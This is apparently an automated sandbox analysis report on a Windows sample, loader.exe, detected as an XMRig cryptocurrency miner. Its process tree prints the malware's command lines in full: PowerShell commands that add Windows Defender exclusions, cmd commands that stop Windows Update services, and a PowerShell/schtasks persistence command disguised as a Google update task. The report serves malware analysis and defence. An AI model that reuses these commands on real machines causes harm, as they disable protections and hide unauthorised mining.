Analysis
  max time kernel: 150s
  max time network: 139s
  platform: windows7_x64
  resource: win7-20240903-en
  resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  submitted: 27/10/2024, 12:26
Static task: static1
Behavioral task: behavioral1
Sample: loader.exe
Resource: win7-20240903-en
General
  Target: loader.exe
  Size: 56.5MB
  MD5: cb5704b35d6f1420581b825a8faee883
  SHA1: 966b5157bd954ca13385db782b39ed56c5a52b9e
  SHA256: 6cf2cd2b186c6d10c081cb5afe7689d52b3ccc3da937c920718724c26573946a
  SHA512: 7276ed0bf256bc9895712c5de6d8c25851d867c62b2688d44e7cbd3ef63eeee0774345e3221665e3fb8e5a24343d7c45dafac7e308b1a67db24d8afab0ce91cb
  SSDEEP: 786432:brZMUVo6ix6I/AXpORG0zC5lYSI0yhRaJ9r3uXSr7dcS1Se34sey66TM0Mg0G+/c:bAwIcpIGsERI0puXSr7qS1eGsO+/QD
Malware Config
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess (9 IoCs)
  description | pid | Process | procid_target
  PID 2424 created 1196 | 2424 | loader.exe | 21   (4 entries)
  PID 2532 created 1196 | 2532 | updater.exe | 21   (5 entries)
Xmrig family
XMRig Miner payload (12 IoCs)
  resource | yara_rule
  behavioral1/memory/2532-31-0x000000013FAC0000-0x0000000143350000-memory.dmp | xmrig
  behavioral1/memory/1276-34-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/1276-36-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/1276-38-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/1276-40-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/1276-42-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/1276-44-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/1276-46-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/1276-48-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/1276-50-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/1276-52-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/1276-54-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
Command and Scripting Interpreter: PowerShell (1 TTPs, 4 IoCs)
  Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid | Process
  2668 | powershell.exe
  2128 | powershell.exe
  3048 | powershell.exe
  1860 | powershell.exe
Executes dropped EXE (1 IoCs)
  pid | Process
  2532 | updater.exe
Loads dropped DLL (1 IoCs)
  pid | Process
  2736 | taskeng.exe
Drops file in System32 directory (4 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe   (4 entries)
Suspicious use of SetThreadContext (2 IoCs)
  description | pid | Process | procid_target
  PID 2532 set thread context of 1308 | 2532 | updater.exe | 58
  PID 2532 set thread context of 1276 | 2532 | updater.exe | 59
Drops file in Program Files directory (2 IoCs)
  description | ioc | Process
  File created | C:\Program Files\Google\Chrome\updater.exe | loader.exe
  File created | C:\Program Files\Google\Libs\WR64.sys | updater.exe
Launches sc.exe (10 IoCs)
  Sc.exe is a Windows utility to control services on the system.
  pid | Process
  2060 | sc.exe
  2616 | sc.exe
  1332 | sc.exe
  3004 | sc.exe
  3032 | sc.exe
  2976 | sc.exe
  2552 | sc.exe
  384 | sc.exe
  2212 | sc.exe
  2160 | sc.exe
Modifies data under HKEY_USERS (2 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.exe
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 6010c2846b28db01 | powershell.exe
Scheduled Task/Job: Scheduled Task (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  2772 | schtasks.exe
  1352 | schtasks.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid | Process
  2424 | loader.exe   (8 entries)
  2128 | powershell.exe
  3048 | powershell.exe
  2532 | updater.exe   (10 entries)
  2668 | powershell.exe
  1860 | powershell.exe
  1276 | explorer.exe   (remaining 42 entries)
Suspicious use of AdjustPrivilegeToken (5 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 2128 | powershell.exe
  Token: SeDebugPrivilege | 3048 | powershell.exe
  Token: SeDebugPrivilege | 2668 | powershell.exe
  Token: SeDebugPrivilege | 1860 | powershell.exe
  Token: SeLockMemoryPrivilege | 1276 | explorer.exe
Suspicious use of WriteProcessMemory (41 IoCs)
  description | pid | Process | procid_target
  PID 2948 wrote to memory of 3004 | 2948 | cmd.exe | 33   (3 entries)
  PID 2948 wrote to memory of 3032 | 2948 | cmd.exe | 34   (3 entries)
  PID 2948 wrote to memory of 2060 | 2948 | cmd.exe | 35   (3 entries)
  PID 2948 wrote to memory of 2212 | 2948 | cmd.exe | 37   (3 entries)
  PID 2948 wrote to memory of 2160 | 2948 | cmd.exe | 38   (3 entries)
  PID 3048 wrote to memory of 2772 | 3048 | powershell.exe | 41   (3 entries)
  PID 2736 wrote to memory of 2532 | 2736 | taskeng.exe | 45   (3 entries)
  PID 2528 wrote to memory of 2616 | 2528 | cmd.exe | 50   (3 entries)
  PID 2528 wrote to memory of 2976 | 2528 | cmd.exe | 51   (3 entries)
  PID 2528 wrote to memory of 2552 | 2528 | cmd.exe | 52   (3 entries)
  PID 2528 wrote to memory of 384 | 2528 | cmd.exe | 53   (3 entries)
  PID 2528 wrote to memory of 1332 | 2528 | cmd.exe | 54   (3 entries)
  PID 1860 wrote to memory of 1352 | 1860 | powershell.exe | 57   (3 entries)
  PID 2532 wrote to memory of 1308 | 2532 | updater.exe | 58
  PID 2532 wrote to memory of 1276 | 2532 | updater.exe | 59
Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
[1] C:\Windows\Explorer.EXE (PID 1196)
    command line: C:\Windows\Explorer.EXE
  [2] C:\Users\Admin\AppData\Local\Temp\loader.exe (PID 2424)
      command line: "C:\Users\Admin\AppData\Local\Temp\loader.exe"
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2128)
      command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\cmd.exe (PID 2948)
      command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\sc.exe (PID 3004)
        command line: sc stop UsoSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 3032)
        command line: sc stop WaaSMedicSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 2060)
        command line: sc stop wuauserv
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 2212)
        command line: sc stop bits
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 2160)
        command line: sc stop dosvc
        - Launches sc.exe
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3048)
      command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ljqsmfm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\schtasks.exe (PID 2772)
        command line: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
        - Scheduled Task/Job: Scheduled Task
  [2] C:\Windows\System32\schtasks.exe (PID 2900)
      command line: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2668)
      command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\cmd.exe (PID 2528)
      command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\sc.exe (PID 2616)
        command line: sc stop UsoSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 2976)
        command line: sc stop WaaSMedicSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 2552)
        command line: sc stop wuauserv
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 384)
        command line: sc stop bits
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 1332)
        command line: sc stop dosvc
        - Launches sc.exe
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1860)
      command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ljqsmfm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\schtasks.exe (PID 1352)
        command line: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
        - Scheduled Task/Job: Scheduled Task
  [2] C:\Windows\System32\conhost.exe (PID 1308)
      command line: C:\Windows\System32\conhost.exe
  [2] C:\Windows\explorer.exe (PID 1276)
      command line: C:\Windows\explorer.exe
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\system32\taskeng.exe (PID 2736)
    command line: taskeng.exe {8A0881F9-F0BB-46B3-9769-F037743EFCAD} S-1-5-18:NT AUTHORITY\System:Service:
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
  [2] C:\Program Files\Google\Chrome\updater.exe (PID 2532)
      command line: "C:\Program Files\Google\Chrome\updater.exe"
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Enterprise v15
Execution
  Command and Scripting Interpreter (1)
    PowerShell (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
  System Services (1)
    Service Execution (1)
Persistence
  Create or Modify System Process (1)
    Windows Service (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Downloads
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize: 7KB
    MD5: 6391874f342672e5ed0919522f561490
    SHA1: edcb23d4c02ffd2358c46f7333bb29268d8c4e20
    SHA256: 4a7acdb0dc77cb6ec4158b9c452c9ec870a043cc4b2e59a008abc4cb864a5b30
    SHA512: b6707b2276f8b644c3dac86455c9a513d4471c1616a9d2e4734033f01b6730b156538c913cfbf9850628122bdb32c9139d4c9604c7531937528d814bc38ff400